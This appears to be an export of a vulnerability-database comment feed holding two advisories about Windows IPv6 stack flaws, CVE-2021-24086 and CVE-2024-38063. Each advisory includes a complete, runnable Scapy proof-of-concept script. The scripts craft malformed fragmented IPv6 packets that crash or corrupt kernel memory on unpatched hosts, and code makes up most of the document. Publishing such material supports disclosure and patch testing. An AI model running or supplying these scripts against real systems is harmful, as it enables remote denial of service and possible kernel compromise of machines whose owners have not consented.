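# Vulnerability Lookup — Most recent activity

Feed: <https://vulnerability.circl.lu/comment/feed> — updated 2024-09-23T14:33:18.402403+00:00 — contact info@circl.lu — generated by python-feedgen. Contains the recent activity for `{ login }` (the per-user placeholder is left unexpanded in this export).

## Analysis of a Windows IPv6 Fragmentation Vulnerability: CVE-2021-24086

Entry: <https://vulnerability.circl.lu/comment/e58954bd-8b24-451b-9853-c16202937347> (updated 2024-09-23T14:33:18.463400+00:00)

[Analysis of a denial-of-service vulnerability affecting the IPv6 stack of Windows](https://blog.quarkslab.com/analysis-of-a-windows-ipv6-fragmentation-vulnerability-cve-2021-24086.html). The root cause is the mishandling of IPv6 fragments; Microsoft patched the issue in its February 2021 security bulletin.

### Proof of Concept

Running this against an unpatched host crashes it (denial of service), so only point it at systems you are authorized to test. Scapy's layer-3 `send()` needs raw-socket privileges and an IPv6 route to the target; the script takes the target IPv6 address as its only argument.

```python
import random
import sys

from scapy.all import (
    ICMPv6EchoRequest,
    IPv6,
    IPv6ExtHdrFragment,
    IPv6ExtHdrHopByHop,
    IPv6ExtHdrRouting,
    raw,
    send,
)

# Payload size of each outer (on-the-wire) fragment, in bytes. Must stay a
# multiple of 8: IPv6 fragment offsets are expressed in 8-byte units.
FRAGMENT_SIZE = 0x400
# Byte offset at which the inner ICMPv6 echo request is split in two.
LAYER4_FRAG_OFFSET = 0x8

# IPv6 Next Header values.
NEXT_HEADER_IPV6_ROUTE = 43
NEXT_HEADER_IPV6_FRAG = 44
NEXT_HEADER_IPV6_ICMP = 58


def get_layer4():
    """Return the raw ICMPv6 echo request carried inside the inner fragments.

    The checksum is hard-coded because the echo request is delivered in two
    fragments and Scapy cannot compute it across them. NOTE(review): the
    ICMPv6 checksum also covers the IPv6 pseudo-header (source/destination
    addresses), so 0xa472 is only correct for the addresses the author used;
    presumably the bug fires during reassembly, before any checksum check —
    confirm against the write-up if the PoC does not trigger.
    """
    er = ICMPv6EchoRequest(data="PoC for CVE-2021-24086")
    er.cksum = 0xa472
    return raw(er)


def get_inner_packet(target_addr):
    """Build the "inner" packet that the outer fragments reassemble into.

    Layout: 0x1ffa routing extension headers (0xffd0 bytes in total), then a
    fragment header (offset 0, more=1) followed by the first
    LAYER4_FRAG_OFFSET bytes of the echo request.

    ``target_addr`` is not used here; it is kept for signature compatibility.

    Returns:
        ``(inner_packet_bytes, inner_frag_id)``. The id is what
        ``send_last_inner_fragment`` uses to complete the inner datagram.
    """
    inner_frag_id = random.randint(0, 0xffffffff)
    print("**** inner_frag_id: 0x{:x}".format(inner_frag_id))

    raw_er = get_layer4()

    # 0x1ffa routing headers == 0xffd0 bytes (8 bytes each). Every header
    # chains to the next via nh=43; only the last one points at the fragment
    # header.
    routing_hdr = raw(IPv6ExtHdrRouting(addresses=[], nh=NEXT_HEADER_IPV6_ROUTE))
    routes = routing_hdr * (0xffd0 // 8 - 1)
    routes += raw(IPv6ExtHdrRouting(addresses=[], nh=NEXT_HEADER_IPV6_FRAG))

    # First inner fragment header: offset=0, more=1.
    fh = IPv6ExtHdrFragment(offset=0, m=1, id=inner_frag_id, nh=NEXT_HEADER_IPV6_ICMP)
    return routes + raw(fh) + raw_er[:LAYER4_FRAG_OFFSET], inner_frag_id


def send_last_inner_fragment(target_addr, inner_frag_id):
    """Send the second (and last) inner fragment, completing the inner datagram.

    This is the packet expected to trigger the bug once the target has
    reassembled the outer fragments sent by ``trigger``.
    """
    raw_er = get_layer4()
    ip = IPv6(dst=target_addr)
    # Second (and last) inner fragment header: offset=1 (8-byte units), more=0.
    fh = IPv6ExtHdrFragment(
        offset=LAYER4_FRAG_OFFSET // 8, m=0, id=inner_frag_id, nh=NEXT_HEADER_IPV6_ICMP
    )
    send(ip / fh / raw_er[LAYER4_FRAG_OFFSET:])


def trigger(target_addr):
    """Split the inner packet into outer fragments, send them, then send the trigger.

    Every outer fragment is IPv6 / Hop-by-Hop(nh=44) / Fragment(nh=43) / slice
    and shares one outer fragment id; the last fragment has more=0.
    """
    inner_packet, inner_frag_id = get_inner_packet(target_addr)

    ip = IPv6(dst=target_addr)
    hopbyhop = IPv6ExtHdrHopByHop(nh=NEXT_HEADER_IPV6_FRAG)
    outer_frag_id = random.randint(0, 0xffffffff)

    # Slice into FRAGMENT_SIZE pieces; only the last piece may be shorter.
    fragmentable_part = [
        inner_packet[start:start + FRAGMENT_SIZE]
        for start in range(0, len(inner_packet), FRAGMENT_SIZE)
    ]

    print("Preparing frags...")
    frags_to_send = []
    last = len(fragmentable_part) - 1
    for i, piece in enumerate(fragmentable_part):
        more = 0 if i == last else 1
        fh = IPv6ExtHdrFragment(
            offset=(i * FRAGMENT_SIZE) // 8,
            m=more,
            id=outer_frag_id,
            nh=NEXT_HEADER_IPV6_ROUTE,
        )
        frags_to_send.append(ip / hopbyhop / raw(fh / piece))

    print("Sending {} frags...".format(len(frags_to_send)))
    for frag in frags_to_send:
        send(frag)

    print("Now sending the last inner fragment to trigger the bug...")
    send_last_inner_fragment(target_addr, inner_frag_id)


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: cve-2021-24086.py <IPv6 addr>')
        sys.exit(1)
    trigger(sys.argv[1])
```

Published 2024-08-30T12:27:27.331911+00:00.

## Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys

Entry: <https://vulnerability.circl.lu/comment/4be2fca3-59f3-437e-a4db-7c0b2f8acb81> (updated 2024-09-23T14:33:18.463338+00:00)

[Proof of Concept for CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063), an RCE in tcpip.sys patched on August 13th 2024. An [analysis of the vulnerability](https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html) was published on August 27, 2024 by Marcus Hutchins. The PoC was published on GitHub on August 24, 2024.

### Implementation

Implementation details are available on [GitHub](https://github.com/ynwarcs/CVE-2024-38063/blob/main/script/cve-2024-38063.py). The script must be edited before use (`ip_addr` is required; `iface` and `mac_addr` are optional). It is a memory-corruption trigger rather than a weaponized exploit: on an unpatched target it corrupts kernel memory in tcpip.sys and will most likely crash the host, so use it only against systems you are authorized to test.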
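```python
import sys
import time

from scapy.all import (
    Ether,
    IPv6,
    IPv6ExtHdrDestOpt,
    IPv6ExtHdrFragment,
    PadN,
    send,
    sendp,
)

# --- configuration: edit before running ------------------------------------
iface = ''      # outgoing interface; '' lets Scapy pick one from its routing table
ip_addr = ''    # target IPv6 address (required)
mac_addr = ''   # destination MAC; when set, frames are sent at layer 2 with sendp()
num_tries = 20
num_batches = 20


def _get_l3_packets(i):
    """Return the three layer-3 packets that make up attempt ``i``.

    Each attempt uses its own fragment id and hop limit. The first packet
    carries a Destination Options header whose PadN option is encoded with
    option type 0x81 instead of 1; the second and third form a two-fragment
    datagram whose last fragment (offset 1, more=0) carries no payload. Why
    this sequence reaches the bug is covered by the linked analysis, not by
    anything in this script.
    """
    frag_id = 0xdebac1e + i
    first = IPv6(fl=1, hlim=64 + i, dst=ip_addr) / IPv6ExtHdrDestOpt(
        options=[PadN(otype=0x81, optdata='a' * 3)]
    )
    second = (
        IPv6(fl=1, hlim=64 + i, dst=ip_addr)
        / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0)
        / 'aaaaaaaa'
    )
    third = IPv6(fl=1, hlim=64 + i, dst=ip_addr) / IPv6ExtHdrFragment(
        id=frag_id, m=0, offset=1
    )
    return [first, second, third]


def get_packets_with_mac(i):
    """Return the attempt-``i`` packets wrapped in Ethernet frames to ``mac_addr``."""
    return [Ether(dst=mac_addr) / pkt for pkt in _get_l3_packets(i)]


def get_packets(i):
    """Return the attempt-``i`` packets: layer 2 when ``mac_addr`` is set, else layer 3."""
    if mac_addr != '':
        return get_packets_with_mac(i)
    return _get_l3_packets(i)


def main():
    """Build every batch up front, send it, then count down while the target processes it."""
    if ip_addr == '':
        sys.exit("Set ip_addr (and, if needed, iface / mac_addr) at the top of the script first.")

    final_ps = []
    for _ in range(num_batches):
        for i in range(num_tries):
            # Each attempt is queued twice, as in the original PoC.
            final_ps += get_packets(i) + get_packets(i)

    print("Sending packets")
    # Pass the interface by keyword: in Scapy < 2.5 the second positional
    # argument of send()/sendp() is `inter`, not `iface`, so a positional
    # interface name would be misread there. An empty iface is turned into
    # None so Scapy falls back to its own interface selection instead of
    # failing to resolve ''.
    out_iface = iface or None
    if mac_addr != '':
        sendp(final_ps, iface=out_iface)
    else:
        send(final_ps, iface=out_iface)

    # The 60 s wait mirrors the original PoC; presumably it is the target's
    # fragment-reassembly timeout described in the linked analysis.
    for i in range(60):
        print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
        time.sleep(1)
    print("")


if __name__ == "__main__":
    main()
```

Published 2024-08-30T12:36:21.633241+00:00.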